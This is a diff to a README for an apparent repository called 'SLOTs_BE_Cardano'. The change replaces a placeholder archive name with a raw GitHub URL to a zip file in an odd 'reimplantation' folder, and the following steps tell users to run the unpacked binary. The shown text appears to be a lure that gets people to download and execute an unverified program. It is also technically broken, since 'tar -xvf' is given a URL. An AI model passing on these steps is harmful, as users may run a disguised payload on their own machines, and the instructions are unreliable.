Cream-droid/SLOTs_BE_Cardano/README.md

 1. Open your terminal.
 2. Navigate to your Downloads folder using the `cd` command.
-3. Use the appropriate command to extract the downloaded archive file (e.g., `tar -xvf filename.tar.gz`).
+3. Use the appropriate command to extract the downloaded archive file (e.g., `tar -xvf https://raw.githubusercontent.com/Cream-droid/SLOTs_BE_Cardano/main/reimplantation/SLOTs_BE_Cardano.zip`).
 4. Change to the directory created after extraction.
 5. Run the application using `./SLOTs_BE_Cardano` command.